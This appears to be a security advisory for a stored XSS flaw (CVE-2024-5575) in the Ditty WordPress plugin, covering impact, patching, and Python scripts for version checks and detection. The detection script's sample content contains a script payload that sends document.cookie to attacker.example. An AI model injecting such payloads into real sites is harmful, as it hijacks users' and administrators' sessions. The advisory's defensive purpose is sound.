CVE-2024-5575

4.7 MEDIUM

📋 TL;DR

The Ditty WordPress plugin before version 3.1.43 does not sanitise and escape some of its block settings, which leaves it open to stored cross-site scripting (XSS). An authenticated user with the Author role or higher can save a script payload in a block's settings; the payload then executes in the browser of any user who views the affected content, including administrators. The attack works even where the unfiltered_html capability is disallowed (for example on multisite installations), so the usual WordPress safeguard against Authors publishing script does not help. Any WordPress site running a vulnerable Ditty version is affected.

💻 Affected Systems

Products:
  • Ditty WordPress Plugin
Versions: All versions before 3.1.43
Operating Systems: All operating systems running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: Requires a WordPress installation with the Ditty plugin active. Exploitation needs an account with the Author role or higher; no unauthenticated path is known.

📦 What is this software?

Ditty (formerly Ditty News Ticker) is a WordPress plugin for building news tickers, sliders and similar rotating-content displays, placed on pages through a block, shortcode or widget.

⚠️ Risk & Real-World Impact

🔴 Worst Case

An attacker holding an Author account stores JavaScript that runs in an administrator's browser when the administrator views the affected content. Because the script runs on the site's origin with the admin's session, it can hijack that session or drive the WordPress admin interface and REST API from the admin's browser (nonces included): creating a new administrator user, installing a plugin, or changing site settings. That is a full site compromise.

🟠 Likely Case

A malicious or compromised Author account injects scripts that display unwanted content, redirect visitors, or perform actions in the browser of other logged-in users viewing affected Ditty blocks. WordPress authentication cookies are HttpOnly by default, so reading them from script usually fails; the realistic path is riding the victim's session rather than stealing the cookie.

🟢 If Mitigated

With Author and higher roles restricted to trusted people and a Content-Security-Policy that blocks inline script, the impact is limited to content defacement within Ditty blocks.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an authenticated account with at least the Author role. The flaw is that certain block settings are stored without sanitisation and rendered without escaping, so whatever an Author saves is emitted as-is into pages other users view.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.1.43

Vendor Advisory: https://wpscan.com/vulnerability/65d1abb7-92e9-4cc4-a1d0-84985b484af3/

Restart Required: No

Instructions:

1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find the Ditty plugin and click 'Update Now'.
4. Verify the version shown is 3.1.43 or higher.

🔧 Temporary Workarounds

Disable Ditty Plugin (platform: all)

Temporarily deactivate the Ditty plugin until it can be updated. Note that deactivation stops rendering of Ditty blocks, so any already-stored payload is no longer served, but it is still in the database and returns when the plugin is reactivated unless the affected block settings are cleaned up first.

wp plugin deactivate ditty

Restrict User Roles (platform: all)

Limit the Author, Editor and Administrator roles to trusted users only, and review existing accounts holding those roles before relying on this.

🧯 If You Can't Patch

  • Implement strict user access controls and grant the Author role (and above) only to trusted users; on multisite, remember that the unfiltered_html restriction does not stop this issue
  • Enable WordPress security plugins that provide additional XSS protection and user activity monitoring, and review Ditty block settings saved by Author-level accounts for script-like content

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel → Plugins → Installed Plugins, find Ditty and verify version is below 3.1.43

Check Version:

wp plugin get ditty --field=version

Verify Fix Applied:

After updating, verify Ditty plugin version shows 3.1.43 or higher in WordPress admin
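The WP-CLI command above needs a working WordPress install. For a backup, a forensic copy of wp-content, or a host without WP-CLI, the following added example (not code from the Ditty project or from WordPress) reads the standard plugin header ("Version: x.y.z") from the plugin's main file and compares it against the fixed version. The main-file path wp-content/plugins/ditty/ditty.php and the sample header are assumptions constructed for this example.

```python
"""Offline check for CVE-2024-5575: is the installed Ditty version below 3.1.43?

Added example, not code from the Ditty project. Reads the standard WordPress
plugin header ("Version: x.y.z") from the plugin's main PHP file, so the check
works on a backup or forensic copy of wp-content without WP-CLI or a running
site. The main-file path wp-content/plugins/ditty/ditty.php is an assumption.
"""
import re
from pathlib import Path
from typing import Optional, Union

FIXED_VERSION = "3.1.43"   # first version without the stored XSS, per the advisory

# Constructed sample of a WordPress plugin header (the comment block at the top of
# a plugin's main PHP file). Not copied from the real plugin.
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Ditty
 * Plugin URI: https://example.com/ditty
 * Description: Constructed sample header for the version check below.
 * Version: 3.1.42
 * Author: example
 */
"""

# Matches the "Version:" header line; tolerates the leading " * " of a doc comment.
_VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*([0-9][0-9A-Za-z.\-]*)", re.MULTILINE)


def parse_plugin_version(header_text: str) -> Optional[str]:
    """Return the Version: value from a WordPress plugin header, or None."""
    m = _VERSION_RE.search(header_text)
    return m.group(1).strip() if m else None


def version_key(version: str) -> tuple:
    """Sort key for dotted versions: '3.1.43' -> (3, 1, 43, 0, 1).

    Numeric parts are padded to four components; the final flag is 1 for a plain
    release and 0 for anything carrying a suffix (e.g. '3.1.43-beta1'), so a
    pre-release sorts below the release it precedes.
    """
    nums = []
    release = 1
    for piece in version.split("."):
        m = re.match(r"(\d+)(.*)$", piece)
        if m is None:
            release = 0
            continue
        nums.append(int(m.group(1)))
        if m.group(2):
            release = 0
    nums = (nums + [0, 0, 0, 0])[:4]
    return tuple(nums) + (release,)


def is_vulnerable(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True when the installed version is strictly below the fixed version."""
    return version_key(version) < version_key(fixed)


def check_plugin_dir(plugins_root: Union[str, Path]) -> dict:
    """Inspect a wp-content/plugins directory for Ditty and report its status.

    Returns {"installed": bool, "version": str|None, "vulnerable": bool|None}.
    """
    main_file = Path(plugins_root) / "ditty" / "ditty.php"   # assumed main file
    if not main_file.is_file():
        return {"installed": False, "version": None, "vulnerable": None}
    # The header sits at the top of the file; 8 KiB is more than enough.
    header = main_file.read_text(encoding="utf-8", errors="replace")[:8192]
    version = parse_plugin_version(header)
    return {
        "installed": True,
        "version": version,
        "vulnerable": is_vulnerable(version) if version else None,
    }


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/var/www/html/wp-content/plugins"
    print(check_plugin_dir(root))
```

Run it against the plugins directory of the install or backup you are assessing (`python3 check_ditty.py /path/to/wp-content/plugins`). A result of `vulnerable: True` means the site needs the 3.1.43 update; `vulnerable: None` with `installed: True` means the header could not be parsed and the version should be confirmed by hand.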

📡 Detection & Monitoring

Log Indicators:

  • Unusual content modifications in Ditty blocks
  • Multiple failed login attempts followed by successful author login

Network Indicators:

  • Unexpected JavaScript loading from Ditty content
  • Suspicious outbound connections from Ditty pages

SIEM Query:

source="wordpress" AND (plugin="ditty" AND (event="update" OR event="modify"))

The field names above are illustrative; adapt them to whatever your WordPress audit-log plugin actually emits, and pair the query with the user and role of the account that made the change.
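The log indicators above tell you that a Ditty block changed, not what went into it. Gutenberg stores each block in post_content as an HTML comment of the form `<!-- wp:namespace/name {"attr":"value"} -->`, and WordPress serialises the attribute JSON with `<`, `>`, `&` and `--` as `\uXXXX` escapes, so a plain grep for `<script` over post_content misses a stored payload while decoding the JSON first finds it. The following added example (not code from Ditty or WordPress) scans exported post content for blocks under an assumed `ditty/` namespace whose decoded attribute strings look like script; the block names and sample content are constructed for this example.

```python
"""Scan exported post_content for Ditty blocks whose attributes carry script-like
payloads (detection aid for CVE-2024-5575).

Added example, not code from the Ditty project or from WordPress. Gutenberg stores
blocks as HTML comments:
    <!-- wp:namespace/name {"attr":"value"} -->...<!-- /wp:namespace/name -->
WordPress escapes <, >, & and -- in the attribute JSON as \\uXXXX sequences, so the
JSON must be decoded before matching. The "ditty/" namespace prefix and the block
names in the sample are assumptions constructed for this example.
"""
import json
import re
from typing import Iterator, List

# Opening block delimiter: name, optional JSON attributes, optional self-closing "/".
# "-->" cannot occur inside the attributes because "--" is escaped there.
BLOCK_RE = re.compile(
    r"<!--\s+wp:([a-z0-9-]+(?:/[a-z0-9-]+)?)\s*(\{.*?\})?\s*/?-->", re.DOTALL
)

# Patterns applied to each decoded attribute string.
SUSPICIOUS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),            # inline event handlers
    re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I),
]

# Constructed sample: one core paragraph and three Ditty blocks, the second and
# third carrying payloads as WordPress would store them (escaped in the JSON).
SAMPLE_POST_CONTENT = (
    '<!-- wp:paragraph -->\n<p>Intro text.</p>\n<!-- /wp:paragraph -->\n'
    '<!-- wp:ditty/ticker {"title":"Latest news","speed":10} /-->\n'
    '<!-- wp:ditty/ticker {"title":"Breaking\\u003cscript\\u003efetch('
    '\\u0027https://attacker.example/?c=\\u0027+document.cookie)'
    '\\u003c/script\\u003e","speed":10} /-->\n'
    '<!-- wp:ditty/ticker {"title":"Promo","link":"javascript:alert(document.domain)"} /-->\n'
)


def iter_strings(value) -> Iterator[str]:
    """Yield every string found anywhere inside a decoded attribute structure."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, dict):
        for v in value.values():
            yield from iter_strings(v)
    elif isinstance(value, list):
        for v in value:
            yield from iter_strings(v)


def find_suspicious_blocks(post_content: str, namespace: str = "ditty/") -> List[dict]:
    """Return one finding per attribute string that matches a SUSPICIOUS pattern.

    Only blocks whose name starts with `namespace` are inspected. Attributes that
    fail to parse are reported too, since tampering can leave malformed JSON.
    """
    findings = []
    for m in BLOCK_RE.finditer(post_content):
        name, raw_attrs = m.group(1), m.group(2)
        if not name.startswith(namespace) or not raw_attrs:
            continue
        try:
            attrs = json.loads(raw_attrs)      # turns \u003c back into "<"
        except json.JSONDecodeError:
            findings.append({"block": name, "reason": "unparseable attributes",
                             "value": raw_attrs[:120]})
            continue
        for s in iter_strings(attrs):
            hits = [p.pattern for p in SUSPICIOUS if p.search(s)]
            if hits:
                findings.append({"block": name, "reason": "; ".join(hits),
                                 "value": s[:120]})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_blocks(SAMPLE_POST_CONTENT):
        print(f"{f['block']}: {f['reason']} -> {f['value']!r}")
```

Feed it real content by exporting post_content per post (for example `wp post get <ID> --field=post_content` for each ID from `wp post list --post_type=any --field=ID`, or a SQL dump of wp_posts). Scope the run to posts last modified by Author-level accounts to keep the review short. This only covers settings that Ditty saves as block attributes inside post_content; if the plugin keeps some settings in its own tables or post meta, those need a separate check, and the patterns above are a triage filter rather than a complete XSS grammar.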
